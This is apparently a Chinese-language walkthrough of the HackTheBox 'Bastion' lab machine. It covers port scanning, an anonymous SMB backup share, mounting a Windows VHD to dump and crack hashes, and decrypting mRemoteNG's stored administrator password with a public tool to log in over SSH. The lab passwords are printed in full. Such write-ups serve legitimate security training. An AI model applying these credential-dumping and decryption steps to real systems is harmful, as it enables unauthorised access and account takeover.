端口扫描

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.134 >nmap_result
┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ cat nmap_result|grep open| awk -F'/' '{print $1}'|tr '\r\n' ','
22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670,
┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ sudo nmap -sT -sV -sC -O -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-04 10:54 CST
Nmap scan report for 10.10.10.134
Host is up (0.065s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-09-04T02:45:05
|_ start_date: 2024-09-04T02:40:01
|_clock-skew: mean: -50m00s, deviation: 1h09m14s, median: -10m02s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-09-04T04:45:07+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.48 seconds

SMB

只能从SMB入手

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ smbclient -L //10.10.10.134/
Password for [WORKGROUP\mikannse]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ smbclient //10.10.10.134/Backups
Password for [WORKGROUP\mikannse]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 16 18:02:11 2019
.. D 0 Tue Apr 16 18:02:11 2019
note.txt AR 116 Tue Apr 16 18:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 20:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 20:44:02 2019

5638911 blocks of size 4096. 1178598 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \note.txt of size 116 as note.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as WindowsImageBackup/L4mpje-PC/MediaId (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)

结果发现漏了一个目录里的文件,因为那个目录有空格

smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
. Dn 0 Fri Feb 22 20:45:32 2019
.. Dn 0 Fri Feb 22 20:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 20:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 20:45:32 2019

但是因为文件太大似乎下载不下来,得更改一下timeout的限制,在smbclient加一个-t 1000参数,然而实在是太大了下不下来…

主要就是下载这两个.vhd的虚拟磁盘

有种方式是用windows的VPN连接,进SMB共享后用7-zip打开只下载里面的system和sam来转存哈希,但是我的windowVPN实在是连接不上,于是选用将共享挂载到kali

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=

用guestmount来安装.vhd虚拟磁盘到kali

┌──(mikannse㉿kali)-[/mnt]
└─$ sudo mkdir /mnt2
┌──(mikannse㉿kali)-[/mnt]
└─$ sudo guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/

不过安装过程太慢了我就跳过了,总之用secretdump来转存哈希然后爆破拿到l4mpje的密码然后ssh登录,总之得到密码是:bureaulampje

提权

在C:\Program Files (x86)\mRemoteNG 目录发现主机上安装了mRemoteNG,

利用: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper

可以根据配置文件来爆破密码,先把配置文件下载到本地,配置文件在个人用户的Appdata目录下

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ scp l4mpje@10.10.10.134:C:/Users/l4mpje/AppData/Roaming/mRemoteNG/confCons.xml confCons.xml
l4mpje@10.10.10.134's password:
confCons.xml 100% 6316 14.3KB/s 00:00

在配置文件种找到admin的加密密码为

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ python ~/tools/other/CVE-2023-30367-mRemoteNG-password-dumper/mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

ssh连接admin

┌──(mikannse㉿kali)-[~/HTB/bastion]
└─$ ssh administrator@10.10.10.134
administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator

administrator@BASTION C:\Users\Administrator>

碎碎念

利用这种软件配置提权还是比较难recon到的,经验不足